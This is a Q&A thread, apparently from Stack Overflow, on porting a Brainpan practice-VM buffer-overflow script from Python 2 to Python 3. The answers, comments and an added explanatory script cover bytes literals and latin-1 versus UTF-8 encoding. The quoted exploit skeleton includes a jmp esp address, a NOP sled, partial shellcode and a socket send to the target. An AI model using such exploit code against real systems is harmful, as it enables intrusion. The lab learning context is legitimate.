3

I am trying to use Python 3 instead of Python 2 to push a buffer overflow to Brainpan. The problem is that Python 3 converts the bytes way differently. Does anyone know how to push the bytes in a simple way in Python 3 format?

Example code of the python2 code can be found at: http://blog.pentests.pl/2014/06/pentest-lab-brainpan-probably-the-fastest.html?m=1

Taken from the page:

import sys,socket

eip = "\xf3\x12\x17\x31" #jmp esp address 0x311712f3
buf = "\x90"*10 #nop sled
buf += "\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"
buf... {Code snipped}

payload = ("a"*524) + eip + buf

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.0.xxx', 9999)) # connect() takes a single (host, port) tuple

print s.recv(1024)
s.send(payload)
print s.recv(1024)

I've tried s.send(payload.encode()) with various encodings. Nothing works as far as I can tell.

2
  • What do you mean when you say it sends "way different"? It should not ... one thing it does require is bytes instead of str though ... so I would hazard a guess it didn't send at all ... try s.send(bytes(payload)) Commented Aug 21, 2019 at 6:05
  • 1
    eip = "\xf3\x12\x17\x31" is not bytes, it is a str. Use actual bytes objects, so here you could do: eip = b"\xf3\x12\x17\x31", notice the b for a bytes literal. Commented Aug 21, 2019 at 6:08

2 Answers

3

Try using bytes literals such as

eip = b"\xf3\x12\x17\x31"
buf = b"\x90"*10
buf += b"\xb8\xeb\x66\xd9\x09\xd9\xce\xd9\x74\x24\xf4\x5e\x33"

and bypass the need for encoding altogether.


4 Comments

If appending is done a lot and not just in this one line, bytearray will be much more efficient.
I tried this with no go. But I will try again tonight during my next practice session.
I swear I tried this and it didn't work. Anyhow I just retried and it totally worked. Thank you.
After more research this DOESN'T work (technically), as Python 3 adds the b'' header parts around the text, so you get 2 extra bytes at the beginning and 1 at the end.
0

I had the same error, but in addition found that any character after \x7F was mangled after the bad character testing; Python 3 seems to insert a random \xC2 or \xC3 before each char. What worked was to either use byte literals throughout or .encode('latin-1'). There's feedback that latin-1 encoding doesn't always work, see here, but I didn't encounter issues with byte literals.

EDIT: You might find these useful too. Both use Latin-1 encoding for Python 3. http://www.cis.syr.edu/~wedu/seed/Labs_16.04/Software/Buffer_Overflow/Buffer_Overflow.pdf https://blog.lab26.net/vulnerable-vm-walkthrough-brainpan-1-binary-exploitation/
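The three behaviours the answers and comments describe (UTF-8 inserting \xC2/\xC3 lead bytes, str() of a bytes object producing the literal b'...' text, and bytes(str) refusing to run without an encoding) can be checked directly. The following is an added example, not code from the question, either answer or the linked walkthroughs; the fragment, filler length, 32-bit value and tail bytes in it are constructed for illustration and are not the page's own values. It also shows the general habit that avoids the whole problem: build the buffer from bytes objects only and compare it byte-for-byte against what you intended before any socket call.

```python
"""Why a Python 2 payload string must become bytes in Python 3, and how
to confirm the buffer holds exactly the intended byte values."""
import struct

# Constructed sample: the same kind of str literal the Python 2 code used.
# Four of the eight code points are above 0x7F, which is what trips UTF-8.
PY2_STYLE_FRAGMENT = "\x90\x90\xf3\x12\x17\x31\xb8\xeb"


def encode_utf8(fragment: str) -> bytes:
    """str.encode() defaults to UTF-8: every code point in 0x80..0xFF becomes
    a 0xC2 or 0xC3 lead byte plus a continuation byte, so the buffer grows
    and every offset after the first such byte shifts."""
    return fragment.encode()


def encode_latin1(fragment: str) -> bytes:
    """Latin-1 maps code points 0..255 to the single byte of the same value,
    so a Python 2 style string round-trips to the bytes that were meant."""
    return fragment.encode("latin-1")


def str_of_bytes(fragment: bytes) -> bytes:
    """What happens when a bytes object is fed through str(): you get the
    repr text b'\\x90...' and send the characters b, ', \\, x, 9, 0 instead
    of the byte 0x90. This is the extra 2 + 1 bytes a comment above noticed."""
    return str(fragment).encode("ascii")


def bytes_without_encoding(fragment: str):
    """bytes(some_str) is not a conversion in Python 3; it raises TypeError.
    Returns the error text, or None if (unexpectedly) no error occurred."""
    try:
        bytes(fragment)
    except TypeError as exc:
        return str(exc)
    return None


def build_frame(filler_len: int, value: int, tail: bytes) -> bytes:
    """Assemble a raw buffer from bytes objects only: a filler, a 32-bit
    little-endian value packed with struct, then a trailing byte string.
    No str is involved at any point, so no encoding question arises."""
    return b"\x90" * filler_len + struct.pack("<I", value) + tail


def first_mismatch(expected: bytes, actual: bytes) -> int:
    """Offset of the first byte that differs (a length difference counts as a
    mismatch at the shorter length), or -1 when the buffers are identical."""
    for offset, (e, a) in enumerate(zip(expected, actual)):
        if e != a:
            return offset
    if len(expected) != len(actual):
        return min(len(expected), len(actual))
    return -1


if __name__ == "__main__":
    intended = encode_latin1(PY2_STYLE_FRAGMENT)
    print("latin-1 :", len(intended), intended.hex())
    print("utf-8   :", len(encode_utf8(PY2_STYLE_FRAGMENT)),
          encode_utf8(PY2_STYLE_FRAGMENT).hex())
    print("str()   :", len(str_of_bytes(intended)), str_of_bytes(intended))
    print("bytes() :", bytes_without_encoding(PY2_STYLE_FRAGMENT))
    frame = build_frame(4, 0x41424344, b"\x01\x02")
    print("frame   :", frame.hex(), "mismatch at",
          first_mismatch(b"\x90" * 4 + b"DCBA\x01\x02", frame))
```

Running it shows the 8-character fragment becoming 13 bytes under UTF-8 and 32 bytes under str(), while the latin-1 encoding and the bytes-only frame builder give exactly the byte values written in the literal. Using first_mismatch against a hand-assembled expected buffer is a cheap way to catch this class of mistake before blaming the target or the address.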
